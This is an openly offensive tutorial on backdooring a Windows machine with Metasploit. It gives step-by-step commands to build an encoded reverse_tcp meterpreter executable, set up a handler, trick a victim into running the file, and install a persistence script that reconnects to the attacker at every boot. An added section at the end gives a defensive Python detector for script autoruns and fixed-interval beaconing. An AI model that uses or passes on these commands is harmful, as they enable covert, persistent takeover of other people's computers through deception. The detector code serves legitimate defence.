HOW TO CREATE A BACKDOOR WITH METASPLOIT
Hello guys, in this tutorial I will show you how to create a backdoor with Metasploit. Before starting, let me explain a little about Persistent. Metasploit contains two types of backdoors: one is Persistent and the other is Metsvc. Here I am using Persistent to create a backdoor on the victim system, which in my case is Windows. Persistent creates a backdoor that tries to connect back to the attacker's Metasploit instance, and the connect-back happens at system boot or at user logon. You can also configure the time between connect-back attempts, in case the attacker machine is currently not up and you want the backdoor to keep trying to connect to you. How does it work? Under the hood, Persistent creates a VBS script on the victim system and adds it to the appropriate registry location so that it runs automatically. That is all about the Persistent backdoor; now let's look at how it is done…
Step 1 :- Here I am using backtrack5r3 as the attacker system. Open a console and write the following command to create an exploit; here my exploit is named fb_hacked.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.124.130 R | msfencode -t exe -c 16 >fb_hacked.exe
Now the exploit is ready in the root directory and has been successfully encoded.
Step 2 :- Now we enter the msfconsole console. For that,
open a console and write msfconsole
Step 3 :- Then we configure some settings in msfconsole using the following commands
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
(Here PAYLOAD means the code or exploit that actually runs on the victim machine after exploitation. “windows” refers to the victim machine, meterpreter opens a meterpreter session on Windows, and reverse_tcp makes the victim machine connect back to the attacker machine.)
set LHOST 192.168.124.130 (this is the IP address of backtrack, which is the attacker machine; you can use the ifconfig command to see the IP address in backtrack)
set LPORT 4444
exploit
Step 4 :- We run the exploit and wait for the victim to click on it. Now we copy the exploit, send it to the victim and request him/her to open it.
Now when the victim clicks on the fb_hacked exploit, it runs on the victim machine with full permission. After that we have successfully exploited the victim machine and a meterpreter session to the victim machine is open.
Now it's time to create a backdoor; for that we run Persistent using the run command.
run persistence -A -L c:\\ -X -i 10 -p 443 -r 192.168.124.130
(Here -A means automatically start a matching multi/handler to connect to the agent. -L sets the location of the payload, i.e. where the VB script is placed; by default it is kept in the C:\ drive. -X means the agent starts automatically when the victim system boots, -i 10 is the number of seconds to wait between connection attempts, -p 443 is the port on which Metasploit will be listening, and -r is the IP on which the attacker machine is running, which is 192.168.124.130.)
Now keep track of the file marked in yellow, i.e. /root/.msf4/logs/persistence/MUKESH80BAA26A_20131020.5854/MUKESH-80BAA26A_20131020.5854.rc
which allows you to uninstall or delete this backdoor at a later time.
Now we can notice that it just connected back and gave us a new meterpreter session. If I put this meterpreter session in the background using the background command, we find 2 or 3 meterpreter sessions currently waiting for us.
Here session 3 is the new one, which was created by Persistent.
background
sessions -i 3
Now if you want to see what actually happened on the victim machine, go to the C:\ drive of the victim machine; there you will notice that a Visual Basic script has been generated. This is what contains the persistent backdoor.
Now go to backtrack and let's see what happens when the victim system reboots. Reboot the victim system using the reboot command and wait for it to restart.
Here we see that when the system restarts, the previous session, i.e. session 3, is closed. After the reboot the persistent backdoor connects back to us again and opens a new session, i.e. session 4, to the attacker machine. Now we have a new meterpreter session, which we can comfortably connect to using the sessions command
sessions -i 4
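Seen from the defender's side, the walkthrough above leaves two things to hunt for: a VBS script registered to autorun, and connect-back attempts to one address and port at a fixed interval. The following is an added example, not part of the original tutorial; the Run key, the reg query text, the value names and the firewall log format are constructed assumptions.

```python
import re
from statistics import pstdev

# Constructed `reg query` output; the Run key and all value names/paths are assumptions.
REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    kQzWpLmRt    REG_SZ    C:\aBcDeFgH.vbs
"""

# Constructed firewall log: epoch seconds, source host, destination ip:port.
CONN_LOG = """
1000 ws01 192.168.124.130:443
1004 ws01 10.0.0.5:80
1010 ws01 192.168.124.130:443
1020 ws01 192.168.124.130:443
1030 ws01 192.168.124.130:443
1047 ws01 10.0.0.5:80
"""

VALUE = re.compile(r"^\s{4}(.+?)\s{4}(REG_(?:EXPAND_)?SZ)\s{4}(.*)$")
SCRIPT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.I)

def script_autoruns(reg_text):
    """Return (value name, data) for autorun values that launch a script file."""
    hits = []
    for line in reg_text.splitlines():
        m = VALUE.match(line)
        if m and SCRIPT.search(m.group(3)):
            hits.append((m.group(1), m.group(3)))
    return hits

def fixed_interval_peers(log_text, min_attempts=4, max_jitter=1.0):
    """Return {destination: mean gap in seconds} for peers contacted at a near-constant interval."""
    times = {}
    for line in log_text.split("\n"):
        parts = line.split()
        if len(parts) == 3:
            times.setdefault(parts[2], []).append(int(parts[0]))
    result = {}
    for dst, ts in times.items():
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if len(ts) >= min_attempts and pstdev(gaps) <= max_jitter:
            result[dst] = sum(gaps) / len(gaps)
    return result

if __name__ == "__main__":
    print(script_autoruns(REG_QUERY), fixed_interval_peers(CONN_LOG))
```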